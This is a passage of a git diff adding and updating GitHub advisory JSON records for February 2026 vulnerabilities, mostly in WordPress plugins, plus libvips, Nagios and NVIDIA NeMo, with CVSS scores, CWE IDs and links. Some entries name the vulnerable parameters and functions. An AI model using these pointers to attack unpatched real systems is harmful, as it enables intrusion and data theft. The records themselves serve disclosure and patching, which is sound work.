"type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2864" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/38" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/38#issue-3915113401" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347103" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347103" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754557" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T08:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json new file mode 100644 index 0000000000000..7321ce7053113 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj9g-q4j9-47hp", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2112" + ], + "details": "The Dam Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing nonce verification on the pending comment deletion action in the cleanup page. This makes it possible for unauthenticated attackers to delete all pending comments via a forged request granted they can trick an admin into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2112" + }, + { + "type": "WEB", + "url": "https://github.com/webguyio/dam-spam/blob/52e12fb455e7b670af2e0713f9da84d2d1d309ac/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dam-spam/tags/1.0.6/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dam-spam/trunk/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3457369%40dam-spam&new=3457369%40dam-spam&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e336dc27-4a76-4197-929c-b221f42bfe69?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json b/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json index 10c1a76535a4d..b2437c4726c2d 100644 --- a/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json +++ b/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-362" + "CWE-362", + "CWE-367" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json b/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json new file mode 100644 index 0000000000000..b05d3ba2857fa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qjwf-h778-47mm", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2913" + ], + "details": "A vulnerability was determined in libvips up to 8.19.0. The affected element is the function vips_source_read_to_memory of the file libvips/iofuncs/source.c. This manipulation causes heap-based buffer overflow. It is possible to launch the attack on the local host. The attack's complexity is rated as high. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. Patch name: a56feecbe9ed66521d9647ec9fbcd2546eccd7ee. Applying a patch is the recommended action to fix this issue. The confirmation of the bugfix mentions: \"[T]he impact of this is negligible, since this only affects custom seekable sources larger than 4 GiB (and the crash occurs in user code rather than libvips itself).\"", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2913" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/issues/4857" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/issues/4857#issue-3920154326" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/issues/4857#issuecomment-3878479322" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/commit/a56feecbe9ed66521d9647ec9fbcd2546eccd7ee" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347222" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347222" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755224" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qmpj-cvwj-r2m8/GHSA-qmpj-cvwj-r2m8.json b/advisories/unreviewed/2026/02/GHSA-qmpj-cvwj-r2m8/GHSA-qmpj-cvwj-r2m8.json new file mode 100644 index 0000000000000..2e8660325b82b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qmpj-cvwj-r2m8/GHSA-qmpj-cvwj-r2m8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qmpj-cvwj-r2m8", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25394" + ], + "details": "Missing Authorization vulnerability in sparklewpthemes Fitness FSE fitness-fse allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fitness FSE: from n/a through <= 1.0.6.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25394" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/fitness-fse/vulnerability/wordpress-fitness-fse-theme-1-0-6-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json b/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json new file mode 100644 index 0000000000000..45941c2bed175 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qp8f-9474-hr27", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2041" + ], + "details": "Nagios Host zabbixagent_configwizard_func Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the zabbixagent_configwizard_func method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28250.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2041" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-073" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json b/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json index 4bd59fb921ff6..32a00258c2093 100644 --- a/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json +++ b/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json @@ -45,7 +45,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-269" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-qpc7-wrgr-p3hh/GHSA-qpc7-wrgr-p3hh.json b/advisories/unreviewed/2026/02/GHSA-qpc7-wrgr-p3hh/GHSA-qpc7-wrgr-p3hh.json new file mode 100644 index 0000000000000..efa536400ecc6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qpc7-wrgr-p3hh/GHSA-qpc7-wrgr-p3hh.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpc7-wrgr-p3hh", + "modified": "2026-02-19T18:31:55Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-2817" + ], + "details": "Use of insecure directory in Spring Data Geode snapshot import extracts archives into predictable, permissive directories under the system temp location. On shared hosts, a local user with basic privileges can access another user’s extracted snapshot contents, leading to unintended exposure of cache data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2817" + }, + { + "type": "WEB", + "url": "https://www.herodevs.com/vulnerability-directory/cve-2026-2817" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-378" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:25:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json new file mode 100644 index 0000000000000..de9398f896eab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qph2-xm7h-wv73", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2576" + ], + "details": "The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2576" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/controllers/pages/class-checkout.php#L126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/db/class-db-query-set.php#L37" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463307/business-directory-plugin/trunk/includes/db/class-db-query-set.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8ec7d25-1574-416c-b5fd-3a71b1cc09d2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qpmp-894x-mvrq/GHSA-qpmp-894x-mvrq.json b/advisories/unreviewed/2026/02/GHSA-qpmp-894x-mvrq/GHSA-qpmp-894x-mvrq.json new file mode 100644 index 0000000000000..20cce662b2c32 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qpmp-894x-mvrq/GHSA-qpmp-894x-mvrq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpmp-894x-mvrq", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25418" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in bitpressadmin Bit Form bit-form allows SQL Injection.This issue affects Bit Form: from n/a through <= 2.21.10.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25418" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bit-form/vulnerability/wordpress-bit-form-plugin-2-21-10-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json new file mode 100644 index 0000000000000..8039ad0742203 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq2v-q6qr-p5vx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33251" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33251" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33251" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq55-xggh-hmxg/GHSA-qq55-xggh-hmxg.json b/advisories/unreviewed/2026/02/GHSA-qq55-xggh-hmxg/GHSA-qq55-xggh-hmxg.json new file mode 100644 index 0000000000000..b8362a3483c5f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq55-xggh-hmxg/GHSA-qq55-xggh-hmxg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq55-xggh-hmxg", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-1405" + ], + "details": "The Slider Future plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'slider_future_handle_image_upload' function in all versions up to, and including, 1.0.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1405" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/slider-future/tags/1.0.5/slider-future.php#L177" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/34b52ca2-c05f-49b7-846f-a67136d7d379?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json b/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json new file mode 100644 index 0000000000000..f57ffd28acb36 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq6w-x794-mfrc", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69377" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Path Traversal.This issue affects User Extra Fields: from n/a through <= 17.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69377" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-17-0-arbitrary-file-deletion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json new file mode 100644 index 0000000000000..00126b1233e55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq7g-427f-cm2r", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-1426" + ], + "details": "The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibility layer. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. Note: This vulnerability requires the Live Composer plugin to also be installed and active.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1426" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/502.html" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L25" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L28" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L33" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449344/#file418" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e76d57-217f-4f21-8bc6-a86290783a19?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json b/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json new file mode 100644 index 0000000000000..dd93f8cee5a75 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqfx-94p8-6p39", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25438" + ], + "details": "LabCollector 5.423 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL commands by injecting malicious code through POST parameters. Attackers can submit crafted SQL payloads in the login parameter of login.php or the user_name parameter of retrieve_password.php to extract sensitive database information without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25438" + }, + { + "type": "WEB", + "url": "https://labcollector.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47460" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/labcollector-sql-injection-via-loginphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json new file mode 100644 index 0000000000000..2a3fa7b421b2c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqj5-wp73-78fr", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69393" + ], + "details": "Missing Authorization vulnerability in Jthemes Exzo exzo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Exzo: from n/a through <= 1.2.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69393" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/exzo/vulnerability/wordpress-exzo-theme-1-2-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json b/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json new file mode 100644 index 0000000000000..c6ce3d3ac6f82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqmj-6rm4-v4q6", + "modified": "2026-02-22T12:30:26Z", + "published": "2026-02-22T12:30:26Z", + "aliases": [ + "CVE-2026-2943" + ], + "details": "A vulnerability was identified in SapneshNaik Student Management System up to f4b4f0928f0b5551a28ee81ae7e7fe47d9345318. This impacts an unknown function of the file index.php. Such manipulation of the argument Error leads to cross site scripting. The attack can be launched remotely. The exploit is publicly available and might be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2943" + }, + { + "type": "WEB", + "url": "https://github.com/duckpigdog/CVE/blob/main/XSS%E2%80%94%E2%80%94SapneshNaik_Student-Management-System.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347313" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347313" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754035" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T11:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqx4-ccm8-48mc/GHSA-qqx4-ccm8-48mc.json b/advisories/unreviewed/2026/02/GHSA-qqx4-ccm8-48mc/GHSA-qqx4-ccm8-48mc.json new file mode 100644 index 0000000000000..e6fc74beb2362 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqx4-ccm8-48mc/GHSA-qqx4-ccm8-48mc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqx4-ccm8-48mc", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-13842" + ], + "details": "The Breadcrumb NavXT plugin for WordPress is vulnerable to authorization bypass through user-controlled key in versions up to and including 7.5.0. This is due to the Gutenberg block renderer trusting the $_REQUEST['post_id'] parameter without verification in the includes/blocks/build/breadcrumb-trail/render.php file. This makes it possible for unauthenticated attackers to enumerate and view breadcrumb trails for draft or private posts by manipulating the post_id parameter, revealing post titles and hierarchy that should remain hidden.", + "severity": [ + { + "type": "CVSS_V3", + "score": 